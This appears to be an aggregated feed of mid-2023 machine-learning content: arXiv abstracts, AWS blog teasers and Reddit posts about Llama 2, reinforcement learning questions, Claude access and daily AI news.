    Quantum-enhanced data science, also known as quantum machine learning (QML), is of growing interest as an application of near-term quantum computers. Variational QML algorithms have the potential to solve practical problems on real hardware, particularly when involving quantum data. However, training these algorithms can be challenging and calls for tailored optimization procedures. Specifically, QML applications can require a large shot-count overhead due to the large datasets involved. In this work, we advocate for simultaneous random sampling over both the dataset as well as the measurement operators that define the loss function. We consider a highly general loss function that encompasses many QML applications, and we show how to construct an unbiased estimator of its gradient. This allows us to propose a shot-frugal gradient descent optimizer called Refoqus (REsource Frugal Optimizer for QUantum Stochastic gradient descent). Our numerics indicate that Refoqus can save several orders of magnitude in shot cost, even relative to optimizers that sample over measurement operators alone.
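The core trick the abstract alludes to — subsampling terms of the loss while keeping the gradient estimator unbiased — is simple to state: if the gradient is a sum of N per-term contributions, drawing an index uniformly and scaling that term by N has the full sum as its expectation. A toy check of that identity (plain Python with made-up numbers, not the paper's quantum setting):

```python
# Gradient expressed as a sum of per-term contributions (toy numbers).
terms = [0.5, -1.2, 3.0, 0.7]
full_grad = sum(terms)
N = len(terms)

# Estimator: pick index i uniformly at random, return N * terms[i].
# Its expectation is (1/N) * sum_i (N * terms[i]) = sum(terms): unbiased.
expectation = sum(N * t for t in terms) / N
print(abs(expectation - full_grad) < 1e-12)  # → True
```

Sampling over measurement operators works the same way; the paper's contribution is constructing such an estimator for its general QML loss and quantifying the shot savings.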
    Conformal prediction under ambiguous ground truth. (arXiv:2307.09302v1 [cs.LG])
In safety-critical classification tasks, conformal prediction allows us to perform rigorous uncertainty quantification by providing confidence sets that include the true class with a user-specified probability. This generally assumes the availability of a held-out calibration set with access to ground truth labels. Unfortunately, in many domains, such labels are difficult to obtain and are usually approximated by aggregating expert opinions. In fact, this holds true for almost all datasets, including well-known ones such as CIFAR and ImageNet. Applying conformal prediction using such labels underestimates uncertainty. Indeed, when expert opinions are not resolvable, there is inherent ambiguity present in the labels. That is, we do not have ``crisp'', definitive ground truth labels, and this uncertainty should be taken into account during calibration. In this paper, we develop a conformal prediction framework for such ambiguous ground truth settings which relies on an approximation of the underlying posterior distribution of labels given inputs. We demonstrate our methodology on synthetic and real datasets, including a case study of skin condition classification in dermatology.
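As background for the calibration step the paper generalizes, here is a minimal sketch of vanilla split conformal prediction with crisp labels (pure NumPy; the 1 − p(true class) score, the toy numbers, and the function name are illustrative, not the paper's ambiguous-label method):

```python
import numpy as np

def conformal_sets(cal_probs, cal_labels, test_probs, alpha=0.25):
    """Split conformal prediction with the simple score s = 1 - p(true class).

    cal_probs:  (n, K) predicted class probabilities on the calibration set
    cal_labels: (n,)   integer ground-truth labels (assumed crisp here)
    test_probs: (m, K) predicted probabilities on the test set
    Returns a boolean (m, K) matrix: True means the class is in the set.
    """
    n = len(cal_labels)
    # Nonconformity score: one minus the probability of the true label.
    scores = 1.0 - cal_probs[np.arange(n), cal_labels]
    # Finite-sample-corrected quantile level (requires (n+1)(1-alpha) <= n).
    q_level = np.ceil((n + 1) * (1 - alpha)) / n
    qhat = np.quantile(scores, q_level, method="higher")
    # Include every class whose score would not exceed the threshold.
    return (1.0 - test_probs) <= qhat

# Toy example: a confident calibration set yields a small prediction set.
cal_probs = np.array([[0.9, 0.1], [0.8, 0.2], [0.7, 0.3], [0.95, 0.05]])
cal_labels = np.array([0, 0, 0, 0])
sets = conformal_sets(cal_probs, cal_labels, np.array([[0.85, 0.15]]))
print(sets.tolist())  # → [[True, False]]
```

The paper's point is that when `cal_labels` are themselves aggregated, uncertain expert opinions, this procedure understates uncertainty, motivating calibration against a posterior over labels instead.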
    Nested stochastic block model for simultaneously clustering networks and nodes. (arXiv:2307.09210v1 [stat.ME])
    We introduce the nested stochastic block model (NSBM) to cluster a collection of networks while simultaneously detecting communities within each network. NSBM has several appealing features including the ability to work on unlabeled networks with potentially different node sets, the flexibility to model heterogeneous communities, and the means to automatically select the number of classes for the networks and the number of communities within each network. This is accomplished via a Bayesian model, with a novel application of the nested Dirichlet process (NDP) as a prior to jointly model the between-network and within-network clusters. The dependency introduced by the network data creates nontrivial challenges for the NDP, especially in the development of efficient samplers. For posterior inference, we propose several Markov chain Monte Carlo algorithms including a standard Gibbs sampler, a collapsed Gibbs sampler, and two blocked Gibbs samplers that ultimately return two levels of clustering labels from both within and across the networks. Extensive simulation studies are carried out which demonstrate that the model provides very accurate estimates of both levels of the clustering structure. We also apply our model to two social network datasets that cannot be analyzed using any previous method in the literature due to the anonymity of the nodes and the varying number of nodes in each network.


    Enhance Amazon Lex with conversational FAQ features using LLMs
    Amazon Lex is a service that allows you to quickly and easily build conversational bots (“chatbots”), virtual agents, and interactive voice response (IVR) systems for applications such as Amazon Connect. Artificial intelligence (AI) and machine learning (ML) have been a focus for Amazon for over 20 years, and many of the capabilities that customers use […]  ( 10 min )
    Enhance Amazon Lex with LLMs and improve the FAQ experience using URL ingestion
    In today’s digital world, most consumers would rather find answers to their customer service questions on their own rather than taking the time to reach out to businesses and/or service providers. This blog post explores an innovative solution to build a question and answer chatbot in Amazon Lex that uses existing FAQs from your website. […]  ( 9 min )
    Build an email spam detector using Amazon SageMaker
    Spam emails, also known as junk mail, are sent to a large number of users at once and often contain scams, phishing content, or cryptic messages. Spam emails are sometimes sent manually by a human, but most often they are sent using a bot. Examples of spam emails include fake ads, chain emails, and impersonation […]  ( 6 min )
    Llama 2 foundation models from Meta are now available in Amazon SageMaker JumpStart
    Today, we are excited to announce that Llama 2 foundation models developed by Meta are available for customers through Amazon SageMaker JumpStart. The Llama 2 family of large language models (LLMs) is a collection of pre-trained and fine-tuned generative text models ranging in scale from 7 billion to 70 billion parameters. Fine-tuned LLMs, called Llama-2-chat, […]  ( 14 min )

    [R] Adversarial Robust Deep Reinforcement Learning Requires Redefining Robustness
    https://ojs.aaai.org/index.php/AAAI/article/view/26009/25781 submitted by /u/ml_dnn [link] [comments]  ( 8 min )
    [P] We made Llama13b-v2-chat immediately available as an endpoint for developers
    Hey r/MachineLearning, we've released tools that make it easy to test LLaMa 2 and add it to your own app! Model playground here: https://llama2.ai Hosted chat API here: https://replicate.com/a16z-infra/llama13b-v2-chat If you want to just play with the model, llama2.ai is a very easy way to do it. So far, we’ve found the performance is similar to GPT-3.5 with far fewer parameters, especially for creative tasks and interactions. Developers can: * clone the chatbot app as a starting point (https://github.com/a16z-infra/llama2-chatbot) * use the Replicate endpoint directly (https://replicate.com/a16z-infra/llama13b-v2-chat) * or even deploy your own LLaMA v2 fine tune with Cog (https://github.com/a16z-infra/cog-llama-template) Please let us know what you use this for or if you have feedback! And thanks to all contributors to this model, Meta, Replicate, the Open Source community! submitted by /u/Prestigious-Elk7124 [link] [comments]  ( 9 min )
    [Discussion] Meta open sources llama-2 and tie up with MSFT
    https://about.fb.com/news/2023/07/llama-2/ https://ai.meta.com/llama/ submitted by /u/Electrical_Study_617 [link] [comments]  ( 8 min )
    [N] Llama 2 is here
Looks like a better model than Llama according to the benchmarks they posted. But the biggest difference is that it's free even for commercial usage. https://ai.meta.com/resources/models-and-libraries/llama/ submitted by /u/timedacorn369 [link] [comments]  ( 8 min )
    [D] Data Intelligence VS Information Retrieval
I have to choose one of two electives for the next sem. My questions are: What are Information Retrieval and Data Intelligence? Which is more useful according to industry requirements? Which one should I take as someone who wants to pursue a career as a Machine Learning Engineer or a Data Scientist? submitted by /u/Ethan045627 [link] [comments]  ( 8 min )
    [R] Utilizing AMD GPUs with Unity ML-Agents
    Hello everyone, I've embarked on a project involving Unity's ML-Agents toolkit, and I've hit a roadblock regarding GPU utilization. My system is equipped with an AMD GPU, and I'm aware that most machine learning libraries and tools mainly support NVIDIA GPUs due to their compatibility with CUDA. Has anyone here successfully gotten ML Agents to work optimally with an AMD GPU? If not, are there any alternative methods or libraries you recommend that work well with AMD GPUs? So far, my attempts with TensorFlow and PyTorch have been met with limited success due to their restricted support for AMD GPUs. I've been exploring other potential options like PlaidML and OpenCL, but I'd love to get some input from this community. Any suggestions or resources on tackling this issue would be hugely appreciated. Thank you! submitted by /u/Low-Spray-249 [link] [comments]  ( 9 min )
    [R] Relating images to voltages to angle
If this post content is something you are an expert in and would like to work with me to accomplish these goals as part of my team, I am able to compensate you. I am currently building my team. I have pictures of a 3d printed part that I have sequentially lit by different small light sources, each positioned at a known 3d location relative to the part. The lights are less than 2 meters from the part. Each light casts specific shadows on the part. I measure the size of the shadows and relate them to the angular direction to the origin of the light (2D bearing). My next prototype has photodiodes that I will use to measure the % of shading on each diode by photoexcitation as a voltage. I want to build a pattern recognition model to relate the two outputs to the incident angle of light. This is so in the future I can output the bearing direction towards a light source with an unknown 3d relative position via voltage, and be able to validate the voltage data from images. Please guide me towards a Machine Learning platform or engine (for lack of a better term) that could take this data (% surface shading & voltage) as input and learn how to extract the 2d bearing (and more) from sensor to light source. Thanks submitted by /u/masterjebbi [link] [comments]  ( 9 min )
    London AI4Code meetup w/ Aaron Parisi (Google) on TALM: Tool Augmented Language Models (July 27th) [R]
    The AI4Code reading group is back with Aaron Parisi, Google researcher and lead author of TALM, a framework for augmenting language models with arbitrary tools. Free RSVP: https://lu.ma/mw5ppi46 Paper: https://arxiv.org/abs/2205.12255 🗓 July 27th (Thursday) at 17:00 GMT+1 📍 Zoom 👥 Members of the international AI4Code research community Key ideas - Modeling tool-use via a text-to-text interface - Applying an iterative self-play technique to bootstrap high performance on tasks with few tool-use labelled examples TALM consistently outperforms a non-augmented LM on both a knowledge task (NQ) and reasoning task (MathQA). The AI4Code meetup community consists of like-minded researchers from around the world that network, discuss and share their latest research on AI applications on source code. submitted by /u/dritsakon [link] [comments]  ( 9 min )
    Image Recognition at Scale? [D]
What services/libraries could I use if I wanted to, say, upload 100+ images and ask it to identify what each image is of? I know that in Bard, for example, I can upload one image at a time and it'll identify it for me, but I want to do this at scale. Anyone know of any Python libraries or OCR services that I could use for this? submitted by /u/Groundbreaking-Owl-5 [link] [comments]  ( 8 min )
    [D] How to access Claude AI outside US and UK
Anthropic, a company founded by former researchers from OpenAI, has recently introduced its upgraded chatbot, Claude 2. Claude 2 arrived five months after the initial release of its predecessor, Claude, and brings notable improvements such as longer responses, more up-to-date information, and faster speeds. One of Claude 2's standout features is its ability to process up to 100,000 tokens, equivalent to 75,000 words, in a single prompt. This is a significant improvement over Claude's previous limitation of 9,000 tokens. However, there is one problem: currently, the Claude AI chat is available in the UK and US only. While it's claimed that other regions will soon follow, the exact timeline remains unclear. That said, Anthropic's Claude is easily accessible with a VPN. Here are quick steps for accessing it if you're not living in the UK or US: 1. Buy a VPN from a provider of your choice that has UK or US servers (most VPNs will have them, since these are the main markets for them). This r/vpn comparison table could help you decide which provider to choose and offers nice discounts for some providers; 2. Open the VPN app; 3. Connect to a US or UK server. For the best speed and user experience, it's recommended to connect to a server in whichever country is closer to your current location; 4. Log in/sign up on the Claude AI webpage. You can successfully log in using your personal email address. Using Incognito mode in your browser might be required; 5. Enjoy your easy access to Claude AI despite not being located in the US or UK! Hope this helps someone, happy using! submitted by /u/ProfessionalSource0 [link] [comments]  ( 9 min )
    [D] anyone got code implementation for hyperdreambooth
I'm looking for a code implementation of https://hyperdreambooth.github.io/. It'd be amazing if anyone could point me to a repo or something. Thank you! submitted by /u/SayNo2Tennis [link] [comments]  ( 8 min )
    Sex differences in ML [D]
General question about population stratification in machine learning: if I am interested in the important features for disease prediction in women only, is it worth stratifying my sample to women-only? I.e., do ML algorithms account for gender differences? I have men and women in the dataset, but I am interested in a disease that seems to be diagnosed in women later than in men. submitted by /u/Vegetable-Gazelle728 [link] [comments]  ( 8 min )
    [R] Retentive Network: A Successor to Transformer for Large Language Models
    Paper: https://arxiv.org/abs/2307.08621 Retentive Network: A Successor to Transformer for Large Language Models Yutao Sun, Li Dong, Shaohan Huang, Shuming Ma, Yuqing Xia, Jilong Xue, Jianyong Wang, Furu Wei In this work, we propose Retentive Network (RetNet) as a foundation architecture for large language models, simultaneously achieving training parallelism, low-cost inference, and good performance. We theoretically derive the connection between recurrence and attention. Then we propose the retention mechanism for sequence modeling, which supports three computation paradigms, i.e., parallel, recurrent, and chunkwise recurrent. Specifically, the parallel representation allows for training parallelism. The recurrent representation enables low-cost O(1) inference, which improves decodin…  ( 10 min )
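The equivalence the paper claims between the parallel and recurrent forms of retention is easy to check numerically. A minimal single-head sketch (NumPy; decay γ only, omitting the paper's xPos-style rotation, group normalization, and gating — toy shapes and values throughout):

```python
import numpy as np

rng = np.random.default_rng(0)
T, d = 5, 4          # sequence length, head dimension
gamma = 0.9          # per-head exponential decay
Q = rng.standard_normal((T, d))
K = rng.standard_normal((T, d))
V = rng.standard_normal((T, d))

# Parallel form: O = (Q K^T ⊙ D) V with D[n, m] = gamma^(n-m) for n >= m, else 0.
n, m = np.indices((T, T))
D = np.where(n >= m, gamma ** (n - m), 0.0)
O_parallel = (Q @ K.T * D) @ V

# Recurrent form: S_n = gamma * S_{n-1} + k_n^T v_n,  o_n = q_n S_n.
# Constant-size state S gives the O(1)-per-token inference the abstract mentions.
S = np.zeros((d, d))
O_recurrent = np.empty((T, d))
for t in range(T):
    S = gamma * S + np.outer(K[t], V[t])
    O_recurrent[t] = Q[t] @ S

print(np.allclose(O_parallel, O_recurrent))  # → True
```

Unrolling the recurrence gives o_n = Σ_{m≤n} γ^(n−m) (q_n·k_m) v_m, which is exactly row n of the parallel product — hence "train parallel, decode recurrent".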
    [D] Vector DB Basics: a Star Wars Example
    Amidst all of the stress of AI taking over, here's a light-hearted blog post on Vector DB basics including a Star Wars mini-example for you all to enjoy :) https://preview.redd.it/n79cv8hkzocb1.png?width=1920&format=png&auto=webp&s=984d955c7d4a0e93ce36ca909835d98b65d6ee2d submitted by /u/kazhdan_d [link] [comments]  ( 8 min )
    [D] Derivation of InfoNCE loss
    I've been reading the paper that introduced Contrastive Predictive Coding as well as the InfoNCE section on Lilian Weng's blog post on contrastive learning. After a while of staring and working, I can't figure out how the authors derived equation 5 in the paper. The farthest I get is finding that p(d=i|X, c_t) = 1/(1 + \sum_{j=1, j!=i}^N [p(x_j | c_t) \prod_{l=1, l \neq j \neq i}^N p(x_l)]), but the rest of the derivation is a mystery to me. Is there something super obvious I'm missing? submitted by /u/like_a_tensor [link] [comments]  ( 8 min )
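For reference, the route most write-ups take: the positive sample is drawn from $p(x \mid c_t)$ and the $N-1$ negatives from the proposal $p(x)$, so

```latex
p(d = i \mid X, c_t)
  = \frac{p(x_i \mid c_t) \prod_{l \neq i} p(x_l)}
         {\sum_{j=1}^{N} p(x_j \mid c_t) \prod_{l \neq j} p(x_l)}
  = \frac{p(x_i \mid c_t) / p(x_i)}
         {\sum_{j=1}^{N} p(x_j \mid c_t) / p(x_j)},
```

where the second equality just divides numerator and denominator by $\prod_{l=1}^{N} p(x_l)$. Comparing this posterior with the softmax form of the loss then shows the optimal score $f(x, c_t)$ is proportional to the density ratio $p(x \mid c_t)/p(x)$, which (as I read it) is the content of equation 5.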
    [Discussion] State of highly specialized, topic-specific LLMS?
    Yesterday, I thought about why current conversational LLMs like ChatGPT are always so general. For example, I'm mostly working on Reinforcement Learning problems and would expect a model that is specifically fine-tuned on literature exclusively concerned with RL to give much better answers and more intricate details. ​ Are there any papers or blog posts about this? submitted by /u/seawee1 [link] [comments]  ( 8 min )
    [Research] Using official implementations vs highly popular unofficial implementation for research
So for the past six months I have been working on a domain adaptation research problem. I wanted to inspect/understand the inherent capability of SSL methods to extract domain-invariant features. For this purpose I have been conducting different kinds of experiments. There is a very nice library called lightly that contains implementations of all the published SSL methods, which made things very easy for me in terms of writing code. I am not a PhD student and don't have significant research experience. My guide/mentor is very interested in the work I'm doing, and she aims to publish our work somewhere like NeurIPS or ICML. Probably because of my lack of experience, I may be overthinking things, but I am genuinely concerned: I just don't want to make stupid coding or code-related errors and report wrong results. I just want to know if it's mandatory to use the official implementations of every method I'm benchmarking. For example, SimCLR's official implementation is in TensorFlow and I am using PyTorch. Using the official implementations would introduce these kinds of bottlenecks and slow down my experimentation process. Any advice on this would be greatly appreciated. Thanks. submitted by /u/ashharsha [link] [comments]  ( 9 min )
    [D]💥 How Underdog AI Companies Will Crush Silicon Valley Giants.
Opportunities in AI: Creating Abundant Intelligence. Generative AI like ChatGPT brings complex tasks within reach and is set to transform society. Startups have an opportunity in applying AI to create "abundant intelligence". In the past year, ChatGPT, GitHub Copilot, and Midjourney have rapidly grown to $100M+ revenue. AI startups face competition from tech giants also moving quickly into AI. Startups must pick spots where they have an advantage. Opportunities exist in expanding the application universe into new greenfield opportunities like automating mundane decisions, masking workflow complexity, and reimagining applications. Infrastructure tools make models more powerful by chaining them together and improving accuracy. Opportunity areas include unstructured data management, agent-driven automation, model evaluation, and experimentation. Key players emerging are foundation model providers like OpenAI and Anthropic, companies building domain-specific models, and platforms for autonomous agents. Advantages exist for startups focused on imagination and technical ability to find non-obvious ideas, while large companies retrofit existing businesses. submitted by /u/Yavero [link] [comments]  ( 9 min )
[R] Semantic-SAM: Reproduce and Beyond SAM with Semantic-Aware and Granularity-Abundance
    We introduce Semantic-SAM, a universal image segmentation model to enable segment and recognize anything at any desired granularity. We have trained on the whole SA-1B dataset and our model can reproduce SAM and beyond it. Training and inference code is available! 🔥code & demo link: https://github.com/UX-Decoder/Semantic-SAM 🔥paper link: https://arxiv.org/pdf/2307.04767.pdf 🚀 Features 🔥 Reproduce SAM. SAM training is a sub-task of ours. We have released the training code to reproduce SAM training. 🔥 Beyond SAM. Our newly proposed model offers the following attributes from instance to part level: Granularity Abundance. Our model can produce all possible segmentation granularities for a user click with high quality, which enables more controllable and user-friendly interactive s…  ( 9 min )

    What phenomena are hyperparameters supposed to capture?
Suppose you have an IMU and therefore no (reliable) way to track velocity. In simulation you can train with velocity in any way you like. In this case, what is velocity in this context? Can it be used in the reward function as a form of privileged info, or is it a hyperparameter (and needs an outer loop for optimization)? This is just an example of a problem for sim-2-real, but the question applies generally for hyperparameters in terms of the objective. submitted by /u/FriendlyStandard5985 [link] [comments]  ( 8 min )
    Intro to Vanilla Policy Gradient
    I've written a series of blog posts going into the theory behind the policy gradient algorithm. Anyone who's starting out in RL may find them to be a good introduction! If you want to understand PPO and various actor critic algorithms, this is the place to start. https://kjabon.github.io/blog/2023/VPG/ ​ Let me know if you spot any issues or have any questions. (You can also comment on the post itself, I'll see it). submitted by /u/kjabon [link] [comments]  ( 8 min )
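For anyone who wants the destination before the journey: the core identity the series builds to is the policy gradient theorem, which in its simplest (total-return) form reads

```latex
\nabla_\theta J(\pi_\theta)
  = \mathbb{E}_{\tau \sim \pi_\theta}\!\left[
      \sum_{t=0}^{T} \nabla_\theta \log \pi_\theta(a_t \mid s_t)\, R(\tau)
    \right],
```

with $R(\tau)$ typically replaced by the reward-to-go or an advantage estimate to reduce variance, which is exactly where the actor-critic algorithms mentioned above pick up.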
    RL applications
    So I am aware of applications of RL in games and robotics, as well as applications of contextual bandits for recommender systems. But as I look for possible future research paths in RL, I was wondering if there were any other interesting applications of the field. For instance, I recently learned about RL in procedural content generation. I’m particularly interested in more accessible/less resource heavy ones, though I would be glad to learn about all of them. Any insight and resources on this topic will be greatly appreciated. submitted by /u/Ok_Signature_4944 [link] [comments]  ( 8 min )
    "GKD: Generalized Knowledge Distillation for Auto-regressive Sequence Models", Agarwal et al 2023
    submitted by /u/gwern [link] [comments]  ( 8 min )
    Question about Montezuma's Revenge gym Atari environment
Hi all, I'm running some code (this code, in case anyone's curious) training an agent to learn in the MontezumaRevengeNoFrameskip-v4 environment, and it seems to be working, but the nonzero rewards seemingly being returned by the environment are always 1, rather than the "100" or "1000" points that are supposedly returned by the game. I'd like to change this so I can compare to SOTA benchmarks, which seem to use the actual game score, but also because I want to make sure this isn't a bug or anything. As far as I can tell, the reward of "1" is coming from the environment itself, and not from the code I linked converting any nonzero reward to a 1, but I can't find anything stating that in the documentation I can find, and might be missing something. Does anyone else have more experience with this environment who could tell me what's causing this, and whether it's normal? submitted by /u/LessPoliticalAccount [link] [comments]  ( 9 min )
    Looking for assembly game environments
Hello, I am really impressed by the real-life applications of AlphaDev. I would like to experiment with an assembly game myself, but to the best of my knowledge, it appears that there is no representative environment available. Is there an assembly game environment that you would recommend for reinforcement learning experiments? submitted by /u/Spiritual_Fig3632 [link] [comments]  ( 8 min )
For OpenAI Humanoid-v4: is a 20000 score (average of the last 250 episodes) within 3800 episodes a good score for offline RL?
Do I need to register it somewhere? If people got more than that, OK (no multi-agents). Log: https://preview.redd.it/jf91dab7encb1.png?width=720&format=png&auto=webp&s=89d737fc1f30a6f9ef96575e18e0b8993ba683fd submitted by /u/Timur_1988 [link] [comments]  ( 8 min )
    Help
Hi, I was implementing the actor-critic algorithm, and while running it on the CartPole environment, I noticed that if I repeat the same experiment, I get the exact same results (overlapping plots of actor/critic loss, average return, etc.). How is this possible, as the initialisation should be different for each run? Maybe because the environment is not stochastic? submitted by /u/Interesting-Weeb-699 [link] [comments]  ( 8 min )
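The usual explanation for bit-identical runs is a fixed random seed somewhere (many example scripts seed NumPy/torch/the env globally) — CartPole's reset is random only when left unseeded. A minimal illustration of the effect, with a stand-in function rather than the poster's code:

```python
import numpy as np

def noisy_returns(seed):
    """Stand-in for a training run: the outputs depend on the RNG stream."""
    rng = np.random.default_rng(seed)
    return rng.normal(size=5).round(3).tolist()

# Same fixed seed -> identical "experiments"; different seeds -> different ones.
print(noisy_returns(42) == noisy_returns(42))  # → True
print(noisy_returns(42) == noisy_returns(43))  # → False
```

If every run reuses the same seed (or the library's default), initialization, action sampling, and resets all replay identically, giving overlapping curves.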
    "AlpaGasus: Training A Better Alpaca with Fewer Data", Chen et al 2023 {Samsung}
    submitted by /u/gwern [link] [comments]  ( 8 min )
    Multi agent reinforcement learning - help wanted
Hi guys, thank you in advance to whoever answers. I'm researching MARL and drone swarms for my master's thesis. Drones should navigate a map, avoiding obstacles and finding a target, using just an RGB camera. If a drone collides or reaches the objective, it must stop, but the episode only concludes when all of them finish. I had successfully implemented a single-drone env using Microsoft's AirSim, which converges in less than 100k steps using SB3's PPO. Anyway, I need to do the same for a multi-agent env. I tried a multitude of frameworks: RLlib (which didn't work well), MARLlib (got a successful implementation, but didn't like it and didn't have many results), and now I'm using SB3 + PettingZoo ParallelEnv + SuperSuit. I can easily train the env, but after 1 million steps I still do not get any improvement (see attached pic). Some problems are that evaluation episodes sometimes end before all the drones collide/reach the objective; I had to modify the SuperSuit package because it didn't really support black death well on the Markov wrapper (when a drone is not active, its camera observation is all 0s and actions are not given); evaluation seems to behave differently than training (actions seem "smoothed", almost 0, in particular in the first evaluation episodes); and drones seem to behave better (reach the objective easily) if all the others collided. If any of you are interested, I can attach some code. I had to heavily modify the overridden step function of the ParallelEnv to support training on active agents only (possible_agents variable). I was inspired by this Stack Overflow post: https://stackoverflow.com/questions/73111772/problem-with-pettingzoo-and-stable-baselines3-with-a-parallelenv If you have any advice, or any different framework to try (I should try Tianshou), please tell me. Any help is greatly appreciated. Thank you all. submitted by /u/IntelligentAd6407 [link] [comments]  ( 9 min )

    Personal Assistant AIs?
    What does the market look like for personal assistant AIs? I was looking at trying to code one for myself or try to get a group of my coding friends to help make one up so we can use it for ourselves to make our lives easier. Not sure if this really exists now though. submitted by /u/derpgod123 [link] [comments]  ( 8 min )
    What is the best free AI picture generator available?
    Preferably something that allows NSFW requests. submitted by /u/Ancient_Challenge173 [link] [comments]  ( 8 min )
    Meta/Facebook just released Llama2
    submitted by /u/swierdo [link] [comments]  ( 8 min )
Google Bard uses DeviantArt, Quora, Reddit as sources for its opinions
    submitted by /u/TruestNestor [link] [comments]  ( 8 min )
    Microsoft Inspire AI megathread!
    Starting now submitted by /u/jaketocake [link] [comments]  ( 8 min )
    Here's What Barbie Would Look Like In Every Country
    submitted by /u/World-Tight [link] [comments]  ( 8 min )
    Open source project to generate speech from text with emotion. Are there any?
    I forget what the technical term is, but there are professional tools that can adjust tone/pressure of the speech to generate an emotional voice. Imagine a guy having to stop playing xbox because dinner is ready and he goes “but moooOoOoom, I’m in the middle of a quest. Hhhhng”. I want to be able to generate that. I don’t mind adding annotations for this but I have yet to find a usable open source project that does this. Are there any? (Oh yeah, and I want to make sexy talk. So it’s for porn, it was always about porn. kudos if you’ve guessed it already). submitted by /u/kjarkr [link] [comments]  ( 8 min )
    Mind-Blowing Midjourney Animated Audiobook
Just wanted to share with you an ongoing project that uses AI to enhance the way we are creating stories. If you have questions, let me know. submitted by /u/Pa7adox [link] [comments]  ( 8 min )
    Claude 2 creative writing is lit.
    Made this using claude 2 Prompt: A fight between Shazam and Constantine Results: Here is a very lengthy and detailed description of a fight between Shazam and Constantine: The skies over Gotham City darkened as thunderclouds rolled in, foretelling the epic battle about to unfold. A crack of lightning split the sky and Shazam descended, his red costume blazing like fire, his white cape billowing behind him. His eyes scanned the streets below, searching for his opponent, the cunning magician John Constantine. Constantine stepped out from the shadows of a nearby alley, cigarette dangling from his lips, tan trenchcoat dusty and worn. His hands slid into his pockets and he stared up defiantly at the hero hovering above. "Took you long enough to get here, mate," Constantine called out, his B…  ( 16 min )
    Which AI content creators do you follow?
    There are so many “AI influencers” who are suddenly experts or claim to have the perfect ChatGPT prompt despite no prior involvement in the AI space. Which AI content creators and leaders do you actually follow and learn from? Can include any platforms: Twitter, LinkedIn, YouTube, TikTok, email newsletter, etc. submitted by /u/tridoc [link] [comments]  ( 8 min )
AI videos
Can you help me find alternatives to HeyGen and D-ID Studio? I need to make the reels or shorts for social media that are pretty much going viral nowadays. submitted by /u/Aggressive-Still-886 [link] [comments]  ( 8 min )
    I did it
    submitted by /u/plauge1_ [link] [comments]  ( 8 min )
    One-Minute Daily AI News 7/17/2023
    With generative AI becoming all the rage these days, it’s perhaps not surprising that the technology has been repurposed by malicious actors to their own advantage, enabling avenues for accelerated cybercrime. According to findings from SlashNext, a new generative AI cybercrime tool called WormGPT has been advertised on underground forums as a way for adversaries to launch sophisticated phishing and business email compromise (BEC) attacks.[1] A.I. is a $1 trillion investment opportunity but will be ‘biggest bubble of all time,’ Stability AI CEO Emad Mostaque predicts.[2] The Israel Defense Forces have started using artificial intelligence to select targets for air strikes and organize wartime logistics as tensions escalate in the occupied territories and with arch-rival Iran.[3] MIT researchers have developed PIGINet, a new system that aims to efficiently enhance the problem-solving capabilities of household robots, reducing planning time by 50-80 percent.[4] Sources: [1] https://thehackernews.com/2023/07/wormgpt-new-ai-tool-allows.html [2] https://www.cnbc.com/2023/07/17/ai-will-be-the-biggest-bubble-of-all-time-stability-ai-ceo.html [3] https://www.bloomberg.com/news/articles/2023-07-16/israel-using-ai-systems-to-plan-deadly-military-operations?in_source=embedded-checkout-banner [4] https://interestingengineering.com/innovation/ai-household-robots-problem-solving-skills submitted by /u/Excellent-Target-847 [link] [comments]  ( 9 min )
  • Open

    DSC Weekly 18 July 2023
    Announcements Top Stories In-Depth The post DSC Weekly 18 July 2023 appeared first on Data Science Central.  ( 20 min )
    Leveraging AI for smarter electronic data interchange
    Electronic Data Interchange (EDI) can be traced back to the late 1960s and early 1970s when businesses began to seek more efficient ways to exchange data electronically. Consequently, the concept of using computers to transmit and receive business documents emerged, aiming to replace manual paper-based processes. Then in the 1980s, standards organizations such as ANSI… Read More »Leveraging AI for smarter electronic data interchange The post Leveraging AI for smarter electronic data interchange appeared first on Data Science Central.  ( 20 min )
  • Open

    SimPer: Simple self-supervised learning of periodic targets
    Posted by Daniel McDuff, Staff Research Scientist, and Yuzhe Yang, Student Researcher, Google. Learning from periodic data (signals that repeat, such as a heartbeat or the daily temperature changes on Earth’s surface) is crucial for many real-world applications, from monitoring weather systems to detecting vital signs. For example, in the environmental remote sensing domain, periodic learning is often needed to enable nowcasting of environmental changes, such as precipitation patterns or land surface temperature. In the health domain, learning from video measurement has been shown to extract (quasi-)periodic vital signs such as atrial fibrillation and sleep apnea episodes. Approaches like RepNet highlight the importance of these types of tasks, and present a solution that recognizes rep…  ( 92 min )
  • Open

    Filtering on how words are being used
    Yesterday I wrote about how you could use the spaCy Python library to find proper nouns in a document. Now suppose you want to refine this and find proper nouns that are the subjects of sentences or proper nouns that are direct objects. This post was motivated by a project in which I needed to […] Filtering on how words are being used first appeared on John D. Cook.  ( 5 min )
    Forever chemicals and blood donation
    I saw a headline saying that donating blood lowers the level of forever chemicals in your body. This post will give a back-of-the-envelope calculation to show that this idea is plausible. Suppose there are chemicals in your bloodstream that do not break down and that your body will not filter out. Suppose you have about […] Forever chemicals and blood donation first appeared on John D. Cook.  ( 5 min )
  • Open

    Llama 2
    submitted by /u/nickb [link] [comments]  ( 8 min )
    How can MeanSquaredError possibly be so bad?
    My neural network predicts values in range [-1, 1]. I am using mean squared error as my loss function, and I am quite surprised it yields values as high as 1.7. (Just to be clear, labels are also in range [-1, 1].) I am using tanh as the activation function of the output layer. I take this as an extremely bad sign, since even if the network always predicted the middle value (0), MSE could never be > 1, right? It almost seems like taking the opposite of its predictions would give better results. If I understand this right, how is it even possible that a network can be trained and still perform so horribly? submitted by /u/DDDDarky [link] [comments]  ( 8 min )
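    A quick sanity check in plain Python (with made-up labels, not the poster's data) confirms the intuition: a constant-zero predictor on labels in [-1, 1] is bounded at MSE 1, while an MSE near 1.7 is only reachable if the predictions sit systematically on the wrong side of zero:

```python
import random

# Hypothetical labels in [-1, 1]; any such labels illustrate the bound.
random.seed(0)
labels = [random.uniform(-1, 1) for _ in range(10_000)]

def mse(preds, targets):
    return sum((p - t) ** 2 for p, t in zip(preds, targets)) / len(targets)

# Constant-zero predictor: MSE = mean(y^2) <= 1 whenever |y| <= 1.
zero_mse = mse([0.0] * len(labels), labels)

# Sign-flipped "predictions" (-y for target y): MSE = mean((2y)^2), up to 4,
# so an MSE above 1 means the model is doing worse than predicting zero.
flipped_mse = mse([-y for y in labels], labels)

print(zero_mse, flipped_mse)
```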
    Reconstructing the Mind’s Eye: fMRI-to-Image with Contrastive Learning and Diffusion Priors
